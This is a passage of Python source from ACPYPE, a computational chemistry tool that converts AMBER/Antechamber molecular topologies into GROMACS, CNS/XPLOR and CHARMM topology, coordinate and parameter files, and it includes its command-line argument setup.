self.printDebug("GMX bonds done") self.printDebug("atomPairs %i" % len(self.atomPairs)) temp = [] for pair in self.atomPairs: # if not printed: # tmpFile.write(headPairs) # printed = True a1Name = pair[0].atomName a2Name = pair[1].atomName id1 = pair[0].id id2 = pair[1].id # id1 = self.atoms.index(pair[0]) + 1 # id2 = self.atoms.index(pair[1]) + 1 line = "%6i %6i %6i ; %6s - %-6s\n" % (id1, id2, 1, a1Name, a2Name) temp.append(line) temp.sort() if temp: if amb2gmx: topText.append(headPairs) topText += temp else: itpText.append(headPairs) itpText += temp oitpText.append(headPairs) oitpText += temp self.printDebug("GMX pairs done") self.printDebug("angles %i" % len(self.angles)) temp = [] otemp = [] for angle in self.angles: a1 = angle.atoms[0].atomName a2 = angle.atoms[1].atomName a3 = angle.atoms[2].atomName id1 = angle.atoms[0].id id2 = angle.atoms[1].id id3 = angle.atoms[2].id oat1 = id2oplsATDict.get(id1) oat2 = id2oplsATDict.get(id2) oat3 = id2oplsATDict.get(id3) line = "%6i %6i %6i %6i %13.4e %13.4e ; %6s - %-6s - %-6s\n" % ( id1, id2, id3, 1, angle.thetaEq * radPi, 2 * cal * angle.kTheta, a1, a2, a3, ) oline = "%6i %6i %6i %6i ; %13.4e %13.4e ; %6s - %-4s - %-6s %4s - %+4s - %-4s\n" % ( id1, id2, id3, 1, angle.thetaEq * radPi, 2 * cal * angle.kTheta, a1, a2, a3, oat1, oat2, oat3, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headAngles) topText += temp else: itpText.append(headAngles) itpText += temp oitpText.append(headAngles) oitpText += otemp self.printDebug("GMX angles done") self.setProperDihedralsCoef() self.printDebug("properDihedralsCoefRB %i" % len(self.properDihedralsCoefRB)) self.printDebug("properDihedralsAlphaGamma %i" % len(self.properDihedralsAlphaGamma)) self.printDebug("properDihedralsGmx45 %i" % len(self.properDihedralsGmx45)) temp = [] otemp = [] if self.gmx4: self.printMess("Writing RB dihedrals for old GMX 4.\n") for dih in self.properDihedralsCoefRB: a1 = dih[0][0].atomName a2 = dih[0][1].atomName a3 = dih[0][2].atomName a4 = dih[0][3].atomName id1 = dih[0][0].id id2 = dih[0][1].id id3 = dih[0][2].id id4 = dih[0][3].id oat1 = id2oplsATDict.get(id1) oat2 = id2oplsATDict.get(id2) oat3 = id2oplsATDict.get(id3) oat4 = id2oplsATDict.get(id4) c0, c1, c2, c3, c4, c5 = dih[1] line = "%6i %6i %6i %6i %6i %10.5f %10.5f %10.5f %10.5f %10.5f %10.5f" % ( id1, id2, id3, id4, 3, c0, c1, c2, c3, c4, c5, ) + " ; %6s-%6s-%6s-%6s\n" % (a1, a2, a3, a4) oline = "%6i %6i %6i %6i %6i ; %10.5f %10.5f %10.5f %10.5f %10.5f %10.5f" % ( id1, id2, id3, id4, 3, c0, c1, c2, c3, c4, c5, ) + " ; %6s-%6s-%6s-%6s %4s-%4s-%4s-%4s\n" % (a1, a2, a3, a4, oat1, oat2, oat3, oat4) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headProDih) topText += temp else: itpText.append(headProDih) itpText += temp oitpText.append(headProDih) oitpText += otemp self.printDebug("GMX proper dihedrals done") else: self.printMess("Writing GMX dihedrals for GMX 4.5 and higher.\n") funct = 9 # 9 for dih in self.properDihedralsGmx45: a1 = dih[0][0].atomName a2 = dih[0][1].atomName a3 = dih[0][2].atomName a4 = dih[0][3].atomName id1 = dih[0][0].id id2 = dih[0][1].id id3 = dih[0][2].id id4 = dih[0][3].id ph = dih[1] # phase already in degree kd = dih[2] * cal # kPhi PK pn = dih[3] # .period line = "%6i %6i %6i %6i %6i %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) oline = "%6i %6i %6i %6i %6i ; %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headProDihGmx45) topText += temp else: itpText.append(headProDihGmx45) itpText += temp oitpText.append(headProDihGmx45) oitpText += otemp # for properDihedralsAlphaGamma if not self.gmx4: funct = 4 # 4 else: funct = 1 temp = [] otemp = [] for dih in self.properDihedralsAlphaGamma: a1 = dih[0][0].atomName a2 = dih[0][1].atomName a3 = dih[0][2].atomName a4 = dih[0][3].atomName id1 = dih[0][0].id id2 = dih[0][1].id id3 = dih[0][2].id id4 = dih[0][3].id ph = dih[1] # phase already in degree kd = dih[2] * cal # kPhi PK pn = dih[3] # .period line = "%6i %6i %6i %6i %6i %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) oline = "%6i %6i %6i %6i %6i ; %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headProDihAlphaGamma) topText += temp else: itpText.append(headProDihAlphaGamma) itpText += temp oitpText.append(headProDihAlphaGamma) oitpText += otemp self.printDebug("GMX special proper dihedrals done") self.printDebug("improperDihedrals %i" % len(self.improperDihedrals)) temp = [] otemp = [] for dih in self.improperDihedrals: a1 = dih.atoms[0].atomName a2 = dih.atoms[1].atomName a3 = dih.atoms[2].atomName a4 = dih.atoms[3].atomName id1 = dih.atoms[0].id id2 = dih.atoms[1].id id3 = dih.atoms[2].id id4 = dih.atoms[3].id kd = dih.kPhi * cal pn = dih.period ph = dih.phase * radPi line = "%6i %6i %6i %6i %6i %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) oline = "%6i %6i %6i %6i %6i ; %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headImpDih) topText += temp else: itpText.append(headImpDih) itpText += temp oitpText.append(headImpDih) oitpText += otemp self.printDebug("GMX improper dihedrals done") if not self.direct: for ion in ionsSorted: topText.append(ionsDict[ion[2]] % ion[3]) if nWat: topText.append(headWater) topText.append(headSystem % (self.baseName)) topText.append(headMols) otopText.append(headSystem % (self.baseName)) otopText.append(headMols) if nSolute > 0: topText.append(" %-16s %-6i\n" % (self.baseName, nSolute)) otopText.append(" %-16s %-6i\n" % (self.baseName, nSolute)) if not self.direct: for ion in ionsSorted: topText.append(" %-16s %-6i\n" % (ion[2].upper(), ion[1])) if nWat: topText.append(" %-16s %-6i\n" % ("WAT", nWat)) if self.topo14Data.hasNondefault14(): citation = ( " BERNARDI, A., FALLER, R., REITH, D., and KIRSCHNER, K. N. ACPYPE update for\n" + " nonuniform 1-4 scale factors: Conversion of the GLYCAM06 force field from AMBER\n" + ' to GROMACS. SoftwareX 10 (2019), 100241. doi: 10.1016/j.softx.2019.100241"\n' ) msg = "Non-default 1-4 scale parameters detected. Converting individually. Please cite:\n\n" + citation self.printMess(msg) topText = self.topo14Data.patch_gmx_topol14("".join(topText)) gmxDir = os.path.abspath(".") topFileName = os.path.join(gmxDir, top) topFile = open(topFileName, "w") topFile.writelines(topText) if not amb2gmx: itpFileName = os.path.join(gmxDir, itp) itpFile = open(itpFileName, "w") itpFile.writelines(itpText) oitpFileName = os.path.join(gmxDir, oitp) oitpFile = open(oitpFileName, "w") oitpFile.writelines(oitpText) otopFileName = os.path.join(gmxDir, otop) otopFile = open(otopFileName, "w") otopFile.writelines(otopText) def writeGroFile(self): """Write GRO files""" # print "Writing GROMACS GRO file\n" self.printDebug("writing GRO file") gro = self.baseName + "_GMX.gro" gmxDir = os.path.abspath(".") groFileName = os.path.join(gmxDir, gro) groFile = open(groFileName, "w") groFile.write(head % (gro, date)) groFile.write(" %i\n" % len(self.atoms)) count = 1 for atom in self.atoms: coords = [c * 0.1 for c in atom.coords] resid = atom.resid line = "%5d%5s%5s%5d%8.3f%8.3f%8.3f\n" % ( resid + 1, self.residueLabel[resid], atom.atomName, count, coords[0], coords[1], coords[2], ) count += 1 if count == 100000: count = 0 groFile.write(line) if self.pbc: boxX = self.pbc[0][0] * 0.1 boxY = self.pbc[0][1] * 0.1 boxZ = self.pbc[0][2] * 0.1 vX = self.pbc[1][0] # vY = self.pbc[1][1] # vZ = self.pbc[1][2] if vX == 90.0: self.printDebug("PBC triclinic") text = "%11.5f %11.5f %11.5f\n" % (boxX, boxY, boxZ) elif round(vX, 2) == 109.47: self.printDebug("PBC octahedron") f1 = 0.471405 # 1/3 * sqrt(2) f2 = 0.333333 * boxX v22 = boxY * 2 * f1 v33 = boxZ * f1 * 1.73205 # f1 * sqrt(3) v21 = v31 = v32 = 0.0 v12 = f2 v13 = -f2 v23 = f1 * boxX text = "%11.5f %11.5f %11.5f %11.5f %11.5f %11.5f %11.5f %11.5f %11.5f\n" % ( boxX, v22, v33, v21, v31, v12, v32, v13, v23, ) else: self.printDebug("Box size estimated") X = [a.coords[0] * 0.1 for a in self.atoms] Y = [a.coords[1] * 0.1 for a in self.atoms] Z = [a.coords[2] * 0.1 for a in self.atoms] boxX = max(X) - min(X) # + 2.0 # 2.0 is double of rlist boxY = max(Y) - min(Y) # + 2.0 boxZ = max(Z) - min(Z) # + 2.0 text = "%11.5f %11.5f %11.5f\n" % (boxX * 20.0, boxY * 20.0, boxZ * 20.0) groFile.write(text) def writeMdpFiles(self): """Write MDP for test with GROMACS""" emMdp = """; to test ; gmx grompp -f em.mdp -c {base}_GMX.gro -p {base}_GMX.top -o em.tpr -v ; gmx mdrun -ntmpi 1 -v -deffnm em integrator = steep nsteps = 500 """.format( base=self.baseName ) mdMdp = """; to test ; gmx grompp -f md.mdp -c em.gro -p {base}_GMX.top -o md.tpr ; gmx mdrun -ntmpi 1 -v -deffnm md integrator = md nsteps = 10000 """.format( base=self.baseName ) emMdpFile = open("em.mdp", "w") mdMdpFile = open("md.mdp", "w") emMdpFile.write(emMdp) mdMdpFile.write(mdMdp) def writeCnsTopolFiles(self): """Write CNS topology files""" autoAngleFlag = True autoDihFlag = True cnsDir = os.path.abspath(".") pdb = self.baseName + "_NEW.pdb" par = self.baseName + "_CNS.par" top = self.baseName + "_CNS.top" inp = self.baseName + "_CNS.inp" pdbFileName = os.path.join(cnsDir, pdb) parFileName = os.path.join(cnsDir, par) topFileName = os.path.join(cnsDir, top) inpFileName = os.path.join(cnsDir, inp) self.CnsTopFileName = topFileName self.CnsInpFileName = inpFileName self.CnsParFileName = parFileName self.CnsPdbFileName = pdbFileName parFile = open(parFileName, "w") topFile = open(topFileName, "w") inpFile = open(inpFileName, "w") self.printMess("Writing NEW PDB file\n") self.writePdb(pdbFileName) self.printMess("Writing CNS/XPLOR files\n") # print "Writing CNS PAR file\n" parFile.write("Remarks " + head % (par, date)) parFile.write("\nset echo=false end\n") parFile.write("\n{ Bonds: atomType1 atomType2 kb r0 }\n") lineSet = [] for bond in self.bonds: a1Type = bond.atoms[0].atomType.atomTypeName + "_" a2Type = bond.atoms[1].atomType.atomTypeName + "_" kb = 1000.0 if not self.allhdg: kb = bond.kBond r0 = bond.rEq line = "BOND %5s %5s %8.1f %8.4f\n" % (a1Type, a2Type, kb, r0) lineRev = "BOND %5s %5s %8.1f %8.4f\n" % (a2Type, a1Type, kb, r0) if line not in lineSet: if lineRev not in lineSet: lineSet.append(line) for item in lineSet: parFile.write(item) parFile.write("\n{ Angles: aType1 aType2 aType3 kt t0 }\n") lineSet = [] for angle in self.angles: a1 = angle.atoms[0].atomType.atomTypeName + "_" a2 = angle.atoms[1].atomType.atomTypeName + "_" a3 = angle.atoms[2].atomType.atomTypeName + "_" kt = 500.0 if not self.allhdg: kt = angle.kTheta t0 = angle.thetaEq * radPi line = "ANGLe %5s %5s %5s %8.1f %8.2f\n" % (a1, a2, a3, kt, t0) lineRev = "ANGLe %5s %5s %5s %8.1f %8.2f\n" % (a3, a2, a1, kt, t0) if line not in lineSet: if lineRev not in lineSet: lineSet.append(line) for item in lineSet: parFile.write(item) parFile.write( "\n{ Proper Dihedrals: aType1 aType2 aType3 aType4 kt per\ iod phase }\n" ) lineSet = set() for item in self.condensedProperDihedrals: seq = "" id_ = 0 for dih in item: # id_ = item.index(dih) ll = len(item) a1 = dih.atoms[0].atomType.atomTypeName + "_" a2 = dih.atoms[1].atomType.atomTypeName + "_" a3 = dih.atoms[2].atomType.atomTypeName + "_" a4 = dih.atoms[3].atomType.atomTypeName + "_" kp = 750.0 if not self.allhdg: kp = dih.kPhi p = dih.period ph = dih.phase * radPi if ll > 1: if id_ == 0: line = ( "DIHEdral %5s %5s %5s %5s MULT %1i %7.3f %4i %8\ .2f\n" % (a1, a2, a3, a4, ll, kp, p, ph) ) else: line = "%s %7.3f %4i %8.2f\n" % (40 * " ", kp, p, ph) else: line = "DIHEdral %5s %5s %5s %5s %15.3f %4i %8.2f\n" % (a1, a2, a3, a4, kp, p, ph) seq += line id_ += 1 lineSet.add(seq) for item in lineSet: parFile.write(item) parFile.write( "\n{ Improper Dihedrals: aType1 aType2 aType3 aType4 kt p\ eriod phase }\n" ) lineSet = set() for idh in self.improperDihedrals: a1 = idh.atoms[0].atomType.atomTypeName + "_" a2 = idh.atoms[1].atomType.atomTypeName + "_" a3 = idh.atoms[2].atomType.atomTypeName + "_" a4 = idh.atoms[3].atomType.atomTypeName + "_" kp = 750.0 if not self.allhdg: kp = idh.kPhi p = idh.period ph = idh.phase * radPi line = "IMPRoper %5s %5s %5s %5s %13.1f %4i %8.2f\n" % (a1, a2, a3, a4, kp, p, ph) lineSet.add(line) if self.chiral: for idhc in self.chiralGroups: _atc, neig, angle = idhc a1 = neig[0].atomType.atomTypeName + "_" a2 = neig[1].atomType.atomTypeName + "_" a3 = neig[2].atomType.atomTypeName + "_" a4 = neig[3].atomType.atomTypeName + "_" kp = 11000.0 p = 0 ph = angle line = "IMPRoper %5s %5s %5s %5s %13.1f %4i %8.2f\n" % (a1, a2, a3, a4, kp, p, ph) lineSet.add(line) for item in lineSet: parFile.write(item) parFile.write("\n{ Nonbonded: Type Emin sigma; (1-4): Emin/2 sigma }\n") for at in self.atomTypes: A = at.ACOEF B = at.BCOEF atName = at.atomTypeName + "_" if B == 0.0: sigma = epAmber = ep2 = sig2 = 0.0 else: epAmber = 0.25 * B * B / A ep2 = epAmber / 2.0 sigma = math.pow((A / B), (1.0 / 6)) sig2 = sigma line = "NONBonded %5s %11.6f %11.6f %11.6f %11.6f\n" % (atName, epAmber, sigma, ep2, sig2) parFile.write(line) parFile.write("\nset echo=true end\n") # print "Writing CNS TOP file\n" topFile.write("Remarks " + head % (top, date)) topFile.write("\nset echo=false end\n") topFile.write("\nautogenerate angles=%s dihedrals=%s end\n" % (autoAngleFlag, autoDihFlag)) topFile.write("\n{ atomType mass }\n") for at in self.atomTypes: atType = at.atomTypeName + "_" mass = at.mass line = "MASS %-5s %8.3f\n" % (atType, mass) topFile.write(line) topFile.write("\nRESIdue %s\n" % self.residueLabel[0]) topFile.write("\nGROUP\n") topFile.write("\n{ atomName atomType Charge }\n") for at in self.atoms: atName = at.atomName atType = at.atomType.atomTypeName + "_" charge = at.charge line = "ATOM %-5s TYPE= %-5s CHARGE= %8.4f END\n" % (atName, atType, charge) topFile.write(line) topFile.write("\n{ Bonds: atomName1 atomName2 }\n") for bond in self.bonds: a1Name = bond.atoms[0].atomName a2Name = bond.atoms[1].atomName line = "BOND %-5s %-5s\n" % (a1Name, a2Name) topFile.write(line) if not autoAngleFlag or 1: # generating angles anyway topFile.write("\n{ Angles: atomName1 atomName2 atomName3}\n") for angle in self.angles: a1Name = angle.atoms[0].atomName a2Name = angle.atoms[1].atomName a3Name = angle.atoms[2].atomName line = "ANGLe %-5s %-5s %-5s\n" % (a1Name, a2Name, a3Name) topFile.write(line) if not autoDihFlag or 1: # generating angles anyway topFile.write("\n{ Proper Dihedrals: name1 name2 name3 name4 }\n") for item in self.condensedProperDihedrals: for dih in item: a1Name = dih.atoms[0].atomName a2Name = dih.atoms[1].atomName a3Name = dih.atoms[2].atomName a4Name = dih.atoms[3].atomName line = "DIHEdral %-5s %-5s %-5s %-5s\n" % (a1Name, a2Name, a3Name, a4Name) break topFile.write(line) topFile.write("\n{ Improper Dihedrals: aName1 aName2 aName3 aName4 }\n") for dih in self.improperDihedrals: a1Name = dih.atoms[0].atomName a2Name = dih.atoms[1].atomName a3Name = dih.atoms[2].atomName a4Name = dih.atoms[3].atomName line = "IMPRoper %-5s %-5s %-5s %-5s\n" % (a1Name, a2Name, a3Name, a4Name) topFile.write(line) if self.chiral: for idhc in self.chiralGroups: _atc, neig, angle = idhc a1Name = neig[0].atomName a2Name = neig[1].atomName a3Name = neig[2].atomName a4Name = neig[3].atomName line = "IMPRoper %-5s %-5s %-5s %-5s\n" % (a1Name, a2Name, a3Name, a4Name) topFile.write(line) topFile.write("\nEND {RESIdue %s}\n" % self.residueLabel[0]) topFile.write("\nset echo=true end\n") # print "Writing CNS INP file\n" inpFile.write("Remarks " + head % (inp, date)) inpData = """ topology @%(CNS_top)s end parameters @%(CNS_par)s nbonds atom cdie shift eps=1.0 e14fac=0.4 tolerance=0.5 cutnb=9.0 ctonnb=7.5 ctofnb=8.0 nbxmod=5 vswitch wmin 1.0 end remark dielectric constant eps set to 1.0 end flags exclude elec ? end segment name=" " chain coordinates @%(NEW_pdb)s end end coordinates @%(NEW_pdb)s coord copy end ! Remarks If you want to shake up the coordinates a bit ... vector do (x=x+6*(rand()-0.5)) (all) vector do (y=y+6*(rand()-0.5)) (all) vector do (z=z+6*(rand()-0.5)) (all) write coordinates output=%(CNS_ran)s end ! Remarks RMS diff after randomisation and before minimisation coord rms sele=(known and not hydrogen) end print threshold=0.02 bonds print threshold=3.0 angles print threshold=3.0 dihedrals print threshold=3.0 impropers ! Remarks Do Powell energy minimisation minimise powell nstep=250 drop=40.0 end write coordinates output=%(CNS_min)s end write structure output=%(CNS_psf)s end ! constraints interaction (not hydro) (not hydro) end print threshold=0.02 bonds print threshold=3.0 angles print threshold=3.0 dihedrals print threshold=3.0 impropers flags exclude * include vdw end energy end distance from=(not hydro) to=(not hydro) cutoff=2.6 end ! Remarks RMS fit after minimisation coord fit sele=(known and not hydrogen) end stop """ dictInp = {} dictInp["CNS_top"] = top dictInp["CNS_par"] = par dictInp["NEW_pdb"] = pdb dictInp["CNS_min"] = self.baseName + "_NEW_min.pdb" dictInp["CNS_psf"] = self.baseName + "_CNS.psf" dictInp["CNS_ran"] = self.baseName + "_rand.pdb" line = inpData % dictInp inpFile.write(line) if os.path.exists(self.obchiralExe): self.printDebug("chiralGroups %i" % len(self.chiralGroups)) else: self.printDebug("no 'obchiral' executable, it won't work to store non-planar improper dihedrals!") self.printDebug( "'obchiral' is deprecated in OpenBabel 3.x. Consider installing version 2.4, see http://openbabel.org" ) class ACTopol(AbstractTopol): """ Class to build the AC topologies (Antechamber AmberTools) """ def __init__( self, inputFile, chargeType="bcc", chargeVal=None, multiplicity="1", atomType="gaff", force=False, basename=None, debug=False, outTopol="all", engine="tleap", allhdg=False, timeTol=MAXTIME, qprog="sqm", ekFlag=None, verbose=True, gmx4=False, disam=False, direct=False, is_sorted=False, chiral=False, ): super().__init__() self.debug = debug self.verbose = verbose self.gmx4 = gmx4 self.disam = disam self.direct = direct self.sorted = is_sorted self.chiral = chiral self.inputFile = os.path.basename(inputFile) self.rootDir = os.path.abspath(".") self.absInputFile = os.path.abspath(inputFile) if not os.path.exists(self.absInputFile): self.printWarn("input file doesn't exist") baseOriginal, ext = os.path.splitext(self.inputFile) base = basename or baseOriginal self.baseOriginal = baseOriginal self.baseName = base # name of the input file without ext. self.timeTol = timeTol self.printDebug("Max execution time tolerance is %s" % elapsedTime(self.timeTol)) self.ext = ext if ekFlag == '"None"' or ekFlag is None: self.ekFlag = "" else: self.ekFlag = "-ek %s" % ekFlag self.extOld = ext self.homeDir = self.baseName + ".acpype" self.chargeType = chargeType self.chargeVal = chargeVal self.multiplicity = multiplicity self.atomType = atomType self.gaffDatfile = "gaff.dat" leapGaffFile = "leaprc.gaff" if "2" in self.atomType: leapGaffFile = "leaprc.gaff2" self.gaffDatfile = "gaff2.dat" self.force = force self.engine = engine self.allhdg = allhdg self.acExe = "" dirAmber = os.getenv("AMBERHOME", os.getenv("ACHOME")) if dirAmber: for ac_bin in ["bin", "exe"]: ac_path = os.path.join(dirAmber, ac_bin, "antechamber") if os.path.exists(ac_path): self.acExe = ac_path break if not self.acExe: self.acExe = which("antechamber") or "" # '/Users/alan/Programmes/antechamber-1.27/exe/antechamber' if not os.path.exists(self.acExe): self.printError("no 'antechamber' executable... aborting ! ") hint1 = "HINT1: is 'AMBERHOME' or 'ACHOME' environment variable set?" hint2 = ( "HINT2: is 'antechamber' in your $PATH?" + "\n What 'which antechamber' in your terminal says?" + "\n 'alias' doesn't work for ACPYPE." ) self.printMess(hint1) self.printMess(hint2) sys.exit(17) self.tleapExe = which("tleap") or "" self.sleapExe = which("sleap") or "" self.parmchkExe = which("parmchk2") or "" self.babelExe = which("obabel") or which("babel") or "" if not os.path.exists(self.babelExe): if self.ext != ".mol2" and self.ext != ".mdl": # and self.ext != '.mol': self.printError("no 'babel' executable; you need it if input is PDB") self.printError("otherwise use only MOL2 or MDL file as input ... aborting!") sys.exit(15) else: self.printWarn("no 'babel' executable, no PDB file as input can be used!") acBase = base + "_AC" self.acBaseName = acBase self.acXyzFileName = acBase + ".inpcrd" self.acTopFileName = acBase + ".prmtop" self.acFrcmodFileName = acBase + ".frcmod" self.tmpDir = os.path.join(self.rootDir, ".acpype_tmp_%s" % os.path.basename(base)) self.setResNameCheckCoords() self.guessCharge() acMol2FileName = "%s_%s_%s.mol2" % (base, chargeType, atomType) self.acMol2FileName = acMol2FileName self.charmmBase = "%s_CHARMM" % base self.qFlag = qDict[qprog] self.outTopols = [outTopol] if outTopol == "all": self.outTopols = outTopols self.acParDict = { "base": base, "ext": ext[1:], "acBase": acBase, "acMol2FileName": acMol2FileName, "res": self.resName, "leapAmberFile": leapAmberFile, "baseOrg": self.baseOriginal, "leapGaffFile": leapGaffFile, } class MolTopol(AbstractTopol): """" Class to write topologies and parameters files for several applications http://amber.scripps.edu/formats.html (not updated to amber 10 yet) Parser, take information in AC xyz and top files and convert to objects INPUTS: acFileXyz and acFileTop RETURN: molTopol obj or None """ def __init__( self, acTopolObj=None, acFileXyz=None, acFileTop=None, debug=False, basename=None, verbose=True, gmx4=False, disam=False, direct=False, is_sorted=False, chiral=False, ): super().__init__() self.chiral = chiral self.obchiralExe = which("obchiral") or "" self.allhdg = False self.debug = debug self.gmx4 = gmx4 self.disam = disam self.direct = direct self.sorted = is_sorted self.verbose = verbose self.inputFile = acFileTop if acTopolObj: if not acFileXyz: acFileXyz = acTopolObj.acXyzFileName if not acFileTop: acFileTop = acTopolObj.acTopFileName self._parent = acTopolObj self.allhdg = self._parent.allhdg self.debug = self._parent.debug self.inputFile = self._parent.inputFile if not os.path.exists(acFileXyz) and not os.path.exists(acFileTop): self.printError("Files '%s' and/or '%s' don't exist" % (acFileXyz, acFileTop)) self.printError("molTopol object won't be created") self.xyzFileData = open(acFileXyz, "r").readlines() self.topFileData = [x for x in open(acFileTop, "r").readlines() if not x.startswith("%COMMENT")] self.topo14Data = Topology_14() self.topo14Data.read_amber_topology("".join(self.topFileData)) self.printDebug("prmtop and inpcrd files loaded") # self.pointers = self.getFlagData('POINTERS') self.getResidueLabel() if len(self.residueLabel) > 1: self.baseName = basename or os.path.splitext(os.path.basename(acFileTop))[0] # 'solute' else: self.baseName = basename or self.residueLabel[0] # 3 caps letters if acTopolObj: self.baseName = basename or acTopolObj.baseName self.printDebug("basename defined = '%s'" % self.baseName) self.getAtoms() self.getBonds() self.getAngles() self.getDihedrals() self.getChirals() if not os.path.exists(self.obchiralExe) and self.chiral: self.printWarn("No 'obchiral' executable, it won't work to store non-planar improper dihedrals!") self.printWarn( "'obchiral' is deprecated in OpenBabel 3.x. Consider installing version 2.4, see http://openbabel.org" ) elif self.chiral and not self.chiralGroups: self.printWarn("No chiral atoms found") # self.setAtomPairs() # self.getExcludedAtoms() # a list of FLAGS from acTopFile that matter # self.flags = ( 'POINTERS', 'ATOM_NAME', 'CHARGE', 'MASS', 'ATOM_TYPE_INDEX', # 'NUMBER_EXCLUDED_ATOMS', 'NONBONDED_PARM_INDEX', # 'RESIDUE_LABEL', 'BOND_FORCE_CONSTANT', 'BOND_EQUIL_VALUE', # 'ANGLE_FORCE_CONSTANT', 'ANGLE_EQUIL_VALUE', # 'DIHEDRAL_FORCE_CONSTANT', 'DIHEDRAL_PERIODICITY', # 'DIHEDRAL_PHASE', 'AMBER_ATOM_TYPE' ) # Sort atoms for gromacs output. # JDC if self.sorted: self.printMess("Sorting atoms for gromacs ordering.\n") self.sortAtomsForGromacs() def search(self, name=None, alist=False): """ returns a list with all atomName matching 'name' or just the first case """ ll = [x for x in self.atoms if x.atomName == name.upper()] if ll and not alist: ll = ll[0] return ll class Atom: """ Charges in prmtop file has to be divide by 18.2223 to convert to charge in units of the electron charge. To convert ACOEF and BCOEF to r0 (Ang.) and epsilon (kcal/mol), as seen in gaff.dat for example; same atom type (i = j): r0 = 1/2 * (2 * ACOEF/BCOEF)^(1/6) epsilon = 1/(4 * A) * BCOEF^2 To convert r0 and epsilon to ACOEF and BCOEF ACOEF = sqrt(ep_i * ep_j) * (r0_i + r0_j)^12 BCOEF = 2 * sqrt(ep_i * ep_j) * (r0_i + r0_j)^6 = 2 * ACOEF/(r0_i + r0_j)^6 where index i and j for atom types. Coord is given in Ang. and mass in Atomic Mass Unit. """ def __init__(self, atomName, atomType, id_, resid, mass, charge, coord): self.atomName = atomName self.atomType = atomType self.id = id_ self.cgnr = id_ self.resid = resid self.mass = mass self.charge = charge # / qConv self.coords = coord def __str__(self): return "<Atom id=%s, name=%s, %s>" % (self.id, self.atomName, self.atomType) def __repr__(self): return "<Atom id=%s, name=%s, %s>" % (self.id, self.atomName, self.atomType) class AtomType: """ AtomType per atom in gaff or amber. """ def __init__(self, atomTypeName, mass, ACOEF, BCOEF): self.atomTypeName = atomTypeName self.mass = mass self.ACOEF = ACOEF self.BCOEF = BCOEF def __str__(self): return "<AtomType=%s>" % self.atomTypeName def __repr__(self): return "<AtomType=%s>" % self.atomTypeName class Bond: """ attributes: pair of Atoms, spring constant (kcal/mol), dist. eq. (Ang) """ def __init__(self, atoms, kBond, rEq): self.atoms = atoms self.kBond = kBond self.rEq = rEq def __str__(self): return "<%s, r=%s>" % (self.atoms, self.rEq) def __repr__(self): return "<%s, r=%s>" % (self.atoms, self.rEq) class Angle: """ attributes: 3 Atoms, spring constant (kcal/mol/rad^2), angle eq. (rad) """ def __init__(self, atoms, kTheta, thetaEq): self.atoms = atoms self.kTheta = kTheta self.thetaEq = thetaEq # rad, to convert to degree: thetaEq * 180/Pi def __str__(self): return "<%s, ang=%.2f>" % (self.atoms, self.thetaEq * 180 / Pi) def __repr__(self): return "<%s, ang=%.2f>" % (self.atoms, self.thetaEq * 180 / Pi) class Dihedral: """ attributes: 4 Atoms, spring constant (kcal/mol), periodicity, phase (rad) """ def __init__(self, atoms, kPhi, period, phase): self.atoms = atoms self.kPhi = kPhi self.period = period self.phase = phase # rad, to convert to degree: kPhi * 180/Pi def __str__(self): return "<%s, ang=%.2f>" % (self.atoms, self.phase * 180 / Pi) def __repr__(self): return "<%s, ang=%.2f>" % (self.atoms, self.phase * 180 / Pi) def init_main(): """ Main funcition, to satisfy Conda """ parser = argparse.ArgumentParser(usage=usage + epilog) parser.add_argument( "-i", "--input", action="store", dest="input", help="input file name with either extension '.pdb', '.mdl' or '.mol2' (mandatory if -p and -x not set)", ) parser.add_argument( "-b", "--basename", action="store", dest="basename", help="a basename for the project (folder and output files)", ) parser.add_argument( "-x", "--inpcrd", action="store", dest="inpcrd", help="amber inpcrd file name (always used with -p)", ) parser.add_argument( "-p", "--prmtop", action="store", dest="prmtop", help="amber prmtop file name (always used with -x)", ) parser.add_argument( "-c", "--charge_method", choices=["gas", "bcc", "user"], action="store", default="bcc", dest="charge_method", help="charge method: gas, bcc (default), user (user's charges in mol2 file)", ) parser.add_argument( "-n", "--net_charge", action="store", type=int, default=None, dest="net_charge", help="net molecular charge (int), for gas default is 0", ) parser.add_argument( "-m", "--multiplicity", action="store", type=int, default=1, dest="multiplicity", help="multiplicity (2S+1), default is 1", ) parser.add_argument( "-a", "--atom_type", choices=["gaff", "amber", "gaff2", "amber2"], action="store", default="gaff", dest="atom_type", help="atom type, can be gaff, gaff2, amber (AMBER14SB) or amber2 (AMBER14SB + GAFF2), default is gaff", ) parser.add_argument( "-q", "--qprog", choices=["mopac", "sqm", "divcon"], action="store", default="sqm", dest="qprog", help="am1-bcc flag, sqm (default), divcon, mopac", ) parser.add_argument( "-k", "--keyword", action="store", dest="keyword", help="mopac or sqm keyword, inside quotes", ) parser.add_argument( "-f", "--force", action="store_true", dest="force", help="force topologies recalculation anew", ) parser.add_argument( "-d", "--debug", action="store_true", dest="debug", help="for debugging purposes, keep any temporary file created", ) parser.add_argument( "-o", "--outtop", choices=["all"] + outTopols, action="store", default="all", dest="outtop", help="output topologies: all (default), gmx, cns or charmm", ) parser.add_argument( "-z", "--gmx4", action="store_true", dest="gmx4", help="write RB dihedrals old GMX 4.0", ) parser.add_argument( "-t", "--cnstop", action="store_true", dest="cnstop", help="write CNS topology with allhdg-like parameters (experimental)", ) 